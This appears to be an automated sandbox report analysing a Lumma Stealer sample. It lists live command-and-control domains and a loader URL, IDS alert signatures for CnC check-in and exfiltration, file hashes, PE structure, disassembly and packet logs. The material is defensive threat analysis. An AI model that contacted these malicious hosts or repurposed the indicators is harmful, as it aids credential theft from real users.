                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000005.00000003.2437966347.0000000004E5B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438173649.0000000004E59000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438068649.0000000004E59000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.rootca1.amazontrust.com/rootca1.crl0BitLockerToGo.exe, 00000005.00000003.2483486401.0000000004E32000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BitLockerToGo.exe, 00000005.00000003.2437966347.0000000004E5B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438173649.0000000004E59000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438068649.0000000004E59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 00000005.00000003.2483486401.0000000004E32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000005.00000003.2437966347.0000000004E5B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438173649.0000000004E59000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438068649.0000000004E59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgBitLockerToGo.exe, 00000005.00000003.2484806953.0000000004E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBitLockerToGo.exe, 00000005.00000003.2484501874.0000000005135000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_BitLockerToGo.exe, 00000005.00000003.2484806953.0000000004E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ac.ecosia.org/autocomplete?q=BitLockerToGo.exe, 00000005.00000003.2437966347.0000000004E5B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438173649.0000000004E59000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438068649.0000000004E59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://cycahao.shop/BitLockerToGo.exe, 00000005.00000003.2591264065.00000000006E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://kliptizq.shop/int_clp_ldr_sha.txtBitLockerToGo.exe, 00000005.00000003.2591711975.0000000000745000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2592310542.0000000000745000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.2592834954.0000000000745000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://x1.c.lencr.org/0BitLockerToGo.exe, 00000005.00000003.2483486401.0000000004E32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://x1.i.lencr.org/0BitLockerToGo.exe, 00000005.00000003.2483486401.0000000004E32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBitLockerToGo.exe, 00000005.00000003.2437966347.0000000004E5B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438173649.0000000004E59000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438068649.0000000004E59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cycahao.shop/apibMMCEYBitLockerToGo.exe, 00000005.00000003.2459772417.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?BitLockerToGo.exe, 00000005.00000003.2483486401.0000000004E32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://cycahao.shop/apivVaBitLockerToGo.exe, 00000005.00000003.2459772417.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://kliptizq.shop/int_clp_ldr_sha.txtz1BitLockerToGo.exe, 00000005.00000002.2592679688.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2591264065.00000000006E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://support.mozilla.org/products/firefoxgro.allBitLockerToGo.exe, 00000005.00000003.2484501874.0000000005135000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BitLockerToGo.exe, 00000005.00000003.2437966347.0000000004E5B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438173649.0000000004E59000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438068649.0000000004E59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.mozilla.orBitLockerToGo.exe, 00000005.00000003.2484425080.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            172.67.135.139
                                                                            cycahao.shopUnited States
                                                                            13335CLOUDFLARENETUStrue
                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1581196
                                                                            Start date and time:2024-12-27 08:19:12 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 5m 1s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:7
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:6wFwugeLNG.exe
                                                                            renamed because original name is a hash value
                                                                            Original Sample Name:16b7635bd33367d455f26adc148dbfc3.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@6/0@2/1
                                                                            EGA Information:
                                                                            • Successful, ratio: 50%
                                                                            HCA Information:
                                                                            • Successful, ratio: 86%
                                                                            • Number of executed functions: 32
                                                                            • Number of non-executed functions: 104
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Execution Graph export aborted for target 6wFwugeLNG.exe, PID 2792 because there are no executed function
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            TimeTypeDescription
                                                                            02:20:32API Interceptor8x Sleep call for process: BitLockerToGo.exe modified
                                                                            No context
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            cycahao.shoptOE2mg8TbU.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.7.3
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUSuUtgy7BbF1.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.71.155
                                                                            x4PaiRVIyM.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.175.134
                                                                            3vLKNycnrz.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.62.151
                                                                            installer.batGet hashmaliciousVidarBrowse
                                                                            • 172.64.41.3
                                                                            skript.batGet hashmaliciousVidarBrowse
                                                                            • 162.159.61.3
                                                                            din.exeGet hashmaliciousVidarBrowse
                                                                            • 172.64.41.3
                                                                            lem.exeGet hashmaliciousVidarBrowse
                                                                            • 172.64.41.3
                                                                            markiz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                            • 104.26.13.205
                                                                            utkin.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                            • 172.67.74.152
                                                                            0Gs0WEGB1E.dllGet hashmaliciousUnknownBrowse
                                                                            • 104.21.22.88
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            a0e9f5d64349fb13191bc781f81f42e1uUtgy7BbF1.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.135.139
                                                                            x4PaiRVIyM.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.135.139
                                                                            3vLKNycnrz.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.135.139
                                                                            Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.135.139
                                                                            NewI Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.135.139
                                                                            setup.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.135.139
                                                                            exlauncher-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.135.139
                                                                            atw3.dllGet hashmaliciousGozi, UrsnifBrowse
                                                                            • 172.67.135.139
                                                                            installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                            • 172.67.135.139
                                                                            0zBsv1tnt4.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.135.139
                                                                            No context
                                                                            No created / dropped files found
                                                                            File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Entropy (8bit):4.238731288797472
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:6wFwugeLNG.exe
                                                                            File size:11'141'120 bytes
                                                                            MD5:16b7635bd33367d455f26adc148dbfc3
                                                                            SHA1:0ae5aa47351d1732e9a851761ac91796364e5f53
                                                                            SHA256:5f6e9e2cb25c557c1bc5ec4d56a4d3859a06d2d70dbccff887aa7cf115a91f98
                                                                            SHA512:d4c050b5a7aae6bbf8aa176b640c0ca072308283419b9bbad9ef217e37d5da5079b0e439657b71966768bf03e39344d797823f6e9f117b0ae8768b252c24b0f4
                                                                            SSDEEP:98304:leKwA2N3ZL8ciDlpOzI0KnOddh7vtNEzUmMLm/n:MI2N3ZgcK0KnOd70n
                                                                            TLSH:83B63880F9DB04B5EA03183144A7A23F27345E058F24CB97FA5C7F5AEB77BA24932549
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........._..............P-..........I....... Z...@..........................Pd......^a...@................................
                                                                            Icon Hash:3b6120282c4c5a1f
                                                                            Entrypoint:0x4649c0
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:1
                                                                            File Version Major:6
                                                                            File Version Minor:1
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:1
                                                                            Import Hash:9cbefe68f395e67356e2a5d8d1b285c0
                                                                            Instruction
                                                                            jmp 00007F60F4B0AC50h
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            mov ecx, dword ptr [esp+04h]
                                                                            sub esp, 28h
                                                                            mov dword ptr [esp+1Ch], ebx
                                                                            mov dword ptr [esp+10h], ebp
                                                                            mov dword ptr [esp+14h], esi
                                                                            mov dword ptr [esp+18h], edi
                                                                            mov esi, eax
                                                                            mov edx, dword ptr fs:[00000014h]
                                                                            cmp edx, 00000000h
                                                                            jne 00007F60F4B0CFA9h
                                                                            mov eax, 00000000h
                                                                            jmp 00007F60F4B0D006h
                                                                            mov edx, dword ptr [edx+00000000h]
                                                                            cmp edx, 00000000h
                                                                            jne 00007F60F4B0CFA7h
                                                                            call 00007F60F4B0D099h
                                                                            mov dword ptr [esp+20h], edx
                                                                            mov dword ptr [esp+24h], esp
                                                                            mov ebx, dword ptr [edx+18h]
                                                                            mov ebx, dword ptr [ebx]
                                                                            cmp edx, ebx
                                                                            je 00007F60F4B0CFBAh
                                                                            mov ebp, dword ptr fs:[00000014h]
                                                                            mov dword ptr [ebp+00000000h], ebx
                                                                            mov edi, dword ptr [ebx+1Ch]
                                                                            sub edi, 28h
                                                                            mov dword ptr [edi+24h], esp
                                                                            mov esp, edi
                                                                            mov ebx, dword ptr [ecx]
                                                                            mov ecx, dword ptr [ecx+04h]
                                                                            mov dword ptr [esp], ebx
                                                                            mov dword ptr [esp+04h], ecx
                                                                            mov dword ptr [esp+08h], edx
                                                                            call esi
                                                                            mov eax, dword ptr [esp+0Ch]
                                                                            mov esp, dword ptr [esp+24h]
                                                                            mov edx, dword ptr [esp+20h]
                                                                            mov ebp, dword ptr fs:[00000014h]
                                                                            mov dword ptr [ebp+00000000h], edx
                                                                            mov edi, dword ptr [esp+18h]
                                                                            mov esi, dword ptr [esp+14h]
                                                                            mov ebp, dword ptr [esp+10h]
                                                                            mov ebx, dword ptr [esp+1Ch]
                                                                            add esp, 28h
                                                                            retn 0004h
                                                                            ret
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            mov ecx, dword ptr [esp+04h]
                                                                            mov edx, dword ptr [ecx]
                                                                            mov eax, esp
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x60b0000x3dc.idata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x6300000x14c70.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x60c0000x220e8.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x5a28200xa0.data
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x2d4e550x2d5000fb70d63baa5757045e50ced4a260cd96unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x2d60000x2cb9200x2cba00670ac2b218d478936498cd3952bfa6caunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x5a20000x686280x39a0093e15d48bdc8d14d6719de73da1d18d4False0.4503626626898048data5.675197947212246IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .idata0x60b0000x3dc0x400316e6960f94a1dea81def2338192ea7cFalse0.490234375data4.663264085783635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .reloc0x60c0000x220e80x222005632af940e650855b9a9e92288b55e3bFalse0.6016268887362637data6.6582272277435255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            .symtab0x62f0000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x6300000x14c700x14e00ed361b80b11277fa9c4dfe801f8bd6b1False0.8335399513473054data7.4262992221870086IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0x6302f40x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3225609756097561
                                                                            RT_ICON0x63095c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.41263440860215056
                                                                            RT_ICON0x630c440x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5574324324324325
                                                                            RT_ICON0x630d6c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6223347547974414
                                                                            RT_ICON0x631c140x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7369133574007221
                                                                            RT_ICON0x6324bc0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3829479768786127
                                                                            RT_ICON0x632a240xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004662673505254
                                                                            RT_ICON0x6403f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5300829875518672
                                                                            RT_ICON0x6429a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6137429643527205
                                                                            RT_ICON0x643a480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.425531914893617
                                                                            RT_GROUP_ICON0x643eb00x92dataEnglishUnited States0.6438356164383562
                                                                            RT_VERSION0x643f440x584dataEnglishUnited States0.26912181303116145
                                                                            RT_MANIFEST0x6444c80x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                                                                            DLLImport
                                                                            kernel32.dllWriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler
                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-12-27T08:20:31.189614+01002058277ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cycahao .shop)1192.168.2.6567501.1.1.153UDP
                                                                            2024-12-27T08:20:32.744504+01002058278ET MALWARE Observed Win32/Lumma Stealer Related Domain (cycahao .shop in TLS SNI)1192.168.2.649754172.67.135.139443TCP
                                                                            2024-12-27T08:20:32.744504+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649754172.67.135.139443TCP
                                                                            2024-12-27T08:20:33.446130+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649754172.67.135.139443TCP
                                                                            2024-12-27T08:20:33.446130+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649754172.67.135.139443TCP
                                                                            2024-12-27T08:20:34.720753+01002058278ET MALWARE Observed Win32/Lumma Stealer Related Domain (cycahao .shop in TLS SNI)1192.168.2.649761172.67.135.139443TCP
                                                                            2024-12-27T08:20:34.720753+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649761172.67.135.139443TCP
                                                                            2024-12-27T08:20:35.533896+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649761172.67.135.139443TCP
                                                                            2024-12-27T08:20:35.533896+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649761172.67.135.139443TCP
                                                                            2024-12-27T08:20:37.107387+01002058278ET MALWARE Observed Win32/Lumma Stealer Related Domain (cycahao .shop in TLS SNI)1192.168.2.649767172.67.135.139443TCP
                                                                            2024-12-27T08:20:37.107387+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649767172.67.135.139443TCP
                                                                            2024-12-27T08:20:39.415938+01002058278ET MALWARE Observed Win32/Lumma Stealer Related Domain (cycahao .shop in TLS SNI)1192.168.2.649773172.67.135.139443TCP
                                                                            2024-12-27T08:20:39.415938+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649773172.67.135.139443TCP
                                                                            2024-12-27T08:20:41.713969+01002058278ET MALWARE Observed Win32/Lumma Stealer Related Domain (cycahao .shop in TLS SNI)1192.168.2.649779172.67.135.139443TCP
                                                                            2024-12-27T08:20:41.713969+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649779172.67.135.139443TCP
                                                                            2024-12-27T08:20:44.156009+01002058278ET MALWARE Observed Win32/Lumma Stealer Related Domain (cycahao .shop in TLS SNI)1192.168.2.649785172.67.135.139443TCP
                                                                            2024-12-27T08:20:44.156009+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649785172.67.135.139443TCP
                                                                            2024-12-27T08:20:44.906387+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649785172.67.135.139443TCP
                                                                            2024-12-27T08:20:46.581923+01002058278ET MALWARE Observed Win32/Lumma Stealer Related Domain (cycahao .shop in TLS SNI)1192.168.2.649791172.67.135.139443TCP
                                                                            2024-12-27T08:20:46.581923+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649791172.67.135.139443TCP
                                                                            2024-12-27T08:20:50.072641+01002058278ET MALWARE Observed Win32/Lumma Stealer Related Domain (cycahao .shop in TLS SNI)1192.168.2.649801172.67.135.139443TCP
                                                                            2024-12-27T08:20:50.072641+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649801172.67.135.139443TCP
                                                                            2024-12-27T08:20:50.846469+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649801172.67.135.139443TCP
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 27, 2024 08:20:31.513531923 CET49754443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:31.513575077 CET44349754172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:31.513676882 CET49754443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:31.516716957 CET49754443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:31.516731024 CET44349754172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:32.744426012 CET44349754172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:32.744503975 CET49754443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:32.748336077 CET49754443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:32.748349905 CET44349754172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:32.748603106 CET44349754172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:32.794840097 CET49754443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:32.794877052 CET49754443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:32.794960976 CET44349754172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:33.446147919 CET44349754172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:33.446274996 CET44349754172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:33.446336031 CET49754443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:33.448318958 CET49754443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:33.448338985 CET44349754172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:33.448350906 CET49754443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:33.448355913 CET44349754172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:33.509329081 CET49761443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:33.509363890 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:33.509433985 CET49761443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:33.509726048 CET49761443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:33.509737968 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:34.720675945 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:34.720752954 CET49761443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:34.721872091 CET49761443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:34.721880913 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:34.722127914 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:34.723299026 CET49761443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:34.723330975 CET49761443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:34.723385096 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.533900023 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.533958912 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.533998966 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.534010887 CET49761443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:35.534048080 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.534085989 CET49761443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:35.534086943 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.534101009 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.534148932 CET49761443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:35.534156084 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.543443918 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.543490887 CET49761443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:35.543498993 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.551768064 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.551821947 CET49761443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:35.551830053 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.593363047 CET49761443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:35.593377113 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.640275002 CET49761443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:35.725630045 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.729789019 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.729854107 CET49761443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:35.729870081 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.730047941 CET44349761172.67.135.139192.168.2.6
